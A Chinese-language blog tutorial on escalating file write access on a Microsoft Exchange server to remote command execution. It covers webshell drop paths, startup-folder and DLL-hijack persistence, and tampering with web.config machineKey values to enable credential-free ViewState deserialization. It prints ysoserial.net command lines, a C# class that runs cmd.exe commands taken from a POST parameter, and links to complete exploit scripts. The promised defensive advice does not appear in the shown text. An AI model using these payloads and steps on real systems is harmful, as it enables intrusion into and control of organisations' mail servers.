当前位置：文江博客文章教程详情

渗透技巧——从 Exchange 文件读写权限到命令执行

发布于 2024-09-20 14:16:30 字数 13135 浏览 24 评论 0

0x00 前言

在实际的渗透测试过程中，我们会遇到各种不同的环境，例如获得了 Exchange 服务器的文件读写权限，但是无法执行命令。

本文将要提供一种实现方法，分析利用思路，介绍脚本开发的细节，给出防御建议。

0x01 简介

本文将要介绍以下内容：

解决思路
利用方法
程序实现
防御建议

0x02 解决思路

1.常规解决思路

(1) 写入 Webshell

通常选择以下两个位置：

%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth
%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth

选择这两个位置的优点是可以直接访问 Webshell

也可以选择其他位置，例如 %ExchangeInstallPath%\ClientAccess\ecp\ ，写入的文件名称有限制，命令规则可参考 %ExchangeInstallPath%\ClientAccess\ecp\web.config

注：访问 %ExchangeInstallPath%\ClientAccess\ 下的 webshell 需要添加合法用户的登录 Cookie

总的来说，通过写入 Webshell 的方式比较直接，但是 Exchange 服务器有可能禁用了命令执行权限或是拦截系统函数的调用，依旧无法获得命令执行权限。

(2) 写入 PE 文件

写入 exe 文件，可选择以下两种启动文件夹：

系统启动文件夹的位置： %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
用户启动文件夹的位置： %USERPROFILE%\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

写入 dll 文件，可选择系统常见的 dll 劫持位置，例如 c:\Windows\System32\fxsst.dll ，更多细节可参考： https://github.com/3gstudent/Pentest-and-Development-Tips/blob/master/README-en.md

总的来说，通过写入 PE 文件的方式比较被动，需要等待系统加载，无法做到实时的命令执行

2.有效的解决思路

修改 Exchange 配置，设置 MachineKey，通过.Net 反序列化实现命令执行

可供学习的资料：

简单来说，我们通过设置 MachineKey，就能够实现与 CVE-2020-0688 同样的效果，也就是说，设置 MachineKey 为默认值后，可以直接使用 CVE-2020-0688 的利用工具实现命令执行

0x03 利用方法

1.修改%ExchangeInstallPath%\ClientAccess\ecp\web.config

将 <machineKey validationKey="AutoGenerate,IsolateApps" /> 修改为 <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />

如果没有这一属性，那么就在 system.web 下添加 <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />

接下来就可以直接使用 CVE-2020-0688 的利用工具，成熟的利用工具可选择： https://github.com/zcgonvh/CVE-2020-0688/ ，相比其它已开源的利用工具，这款工具能够实时获得命令执行结果，也支持加载 shellcode 的功能，其中的技术细节值得深入研究

注：

CVE-2020-0688 的利用工具大都借助 ysoserial.net 的 TextFormattingRunProperties 实现命令执行，无法实时获得命令执行结果

ysoserial.net-1.32 的 ActivitySurrogateSelectorFromFile 能够通过 Assembly.Load 加载.Net 程序集实现返回命令执行的结果，但是兼容性不够，无法做到支持所有版本的.Net 环境

zcgonvh 开源的 CVE-2020-0688 利用工具解决了 ysoserial.net-1.32 中 ActivitySurrogateSelectorFromFile 兼容性的问题，同时对通信数据做了 AES 加密

ysoserial.net-1.33 修复了 ActivitySurrogateSelectorFromFile 兼容性的 bug， bug 由 zcgonvh 修复

我们知道，CVE-2020-0688 的利用前提是需要掌握一个合法用户的凭据，而我们只获得了 Exchange 服务器的文件读写权限，还无法立即获得合法用户的凭据，这里可以使用接下来的两种方法绕过这个限制

(1) 修改 %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config

这里 validationKey 和 decryptionKey 可以任意指定，字符范围为十六进制，即 0~F

也可以选用以下算法：

MD5
AES
HMACSHA256
HMACSHA384
HMACSHA512

密钥长度需要符合算法要求，学习资料：https://devblogs.microsoft.com/aspnet/cryptographic-improvements-in-asp-net-4-5-pt-1/

(2) 修改 %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config

方法同上

对于这两个位置的.Net 反序列化命令执行，不再需要合法用户的凭据，所以利用程序也需要做修改。下面介绍三种利用程序实现的细节

0x04 实现细节

1. 计算 VIEWSTATEGENERATOR 的两种方法

Exchange 的.Net 反序列化用的是 ViewState，其中必备的参数为 VIEWSTATEGENERATOR，例如 Python 实现的 CVE-2020-0688 利用工具中使用的默认 VIEWSTATEGENERATOR 为 B97B4E27 ，表示的页面为 ecp/default.aspx ，对应的 ysoserial.net 的参数为 --path="/ecp/default.aspx" --apppath="/ecp/"

下面介绍两种计算 VIEWSTATEGENERATOR 的方法：

C# 实现的代码如下：

using System;
class a
{
    static void Main(string[] args)
    {
        int hashcode = StringComparer.InvariantCultureIgnoreCase.GetHashCode("/ecp");
    uint _clientstateid=(uint)(hashcode
+StringComparer.InvariantCultureIgnoreCase.GetHashCode("default_aspx"));
Console.WriteLine(_clientstateid.ToString("X2"));
    }
}

得出结果为 B97B4E27

注：代码来自 http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html

也可以通过网页自动计算，方法如下：

在实际测试环境中，修改 ecp/default.aspx 的内容如下：

<!DOCTYPE HTML>
<html>
<body>
    <form runat="server">
    </form>
</body>
</html>

通过浏览器访问该页面，返回结果中的__VIEWSTATEGENERATOR 即为计算后的结果

2.不需要合法用户凭据的三种反序列化程序实现

(1) 借助 ysoserial.net 的 TextFormattingRunProperties 实现命令执行的 Python 代码

CVE-2020-0688 中对应 ysoserial.net 的参数格式如下：

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{generator}" --viewstateuserkey="{}"

由于我们的利用不需要合法用户的凭据，新的 ysoserial.net 参数格式为：

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"

参数说明如下：

{command}对应我们要执行的命令
{key}对应我们设置的 validationKey
{generator}对应要访问页面的 VIEWSTATEGENERATOR

借助 ysoserial.net 的 TextFormattingRunProperties 生成最终的 VIEWSTATE 数据后，拼接成以下格式：

https://{url}?__VIEWSTATEGENERATOR={generator}&__VIEWSTATE={out_payload}

发送 GET 数据包即可

下面举例进行说明：

选择 Exchange 默认的错误页面： %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx

owa\auth\errorFE.aspx 对应的 VIEWSTATEGENERATOR 为 042A94E8

借助 ysoserial.net 的 TextFormattingRunProperties 生成最终的 VIEWSTATE 数据

最终访问的 URL 为： https://<ip>/owa/auth/errorFE.aspx?__VIEWSTATEGENERATOR=042A94E8&__VIEWSTATE={out_payload}

完整的实现代码已上传至 github，地址如下：https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

代码支持两个位置的反序列化执行，分别为默认存在的文件 %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx 和 %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx

注：由于我们已获得了 Exchange 服务器的文件读写权限，这里可以将代码结果输出至指定文件进行查看，命令示例： net user /domain >c:\test.txt

(2) 借助 ysoserial.net 的 ActivitySurrogateSelectorFromFile 实现命令执行并返回执行结果的 Python 代码

这里使用 ysoserial.net 的版本需要高于 1.32，以避免 ActivitySurrogateSelectorFromFile 兼容性的 bug

新建文件 ExploitClass.cs，内容如下：

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

注：代码引用自 https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/

ysoserial.net 的参数格式如下：

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}

借助 ysoserial.net 的 ActivitySurrogateSelectorFromFile 生成最终的 VIEWSTATE 数据后，构造 POST 数据包，添加名为 cmd 的参数，参数值为要执行的命令

高版本的.NET Framework 会禁止 ActivitySurrogateSelector，可借助 ysoserial.net ActivitySurrogateDisableTypeCheck 进行绕过，对应的参数格式如下：

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"

完整的实现代码已上传至 github，地址如下：https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

代码能够执行命令并获得命令执行的结果，通过 POST 方式以参数__Value 发送数据，通信数据采用逐字符异或加密

(3) 基于 https://github.com/zcgonvh/CVE-2020-0688/实现无凭据利用的 C#代码

VIEWSTATE 数据的生成过程同 https://github.com/zcgonvh/CVE-2020-0688/保持一致，只需要将 validationkey 作为变量传入即可

%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config 和 %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config 均没有限制 POST 请求，所以在利用上不再需要写入空文件，可以直接生成最终的 VIEWSTATE 数据并通过 POST 的方式发送数据

完整的实现代码已上传至 github，地址如下：https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

支持的功能同 https://github.com/zcgonvh/CVE-2020-0688/保持一致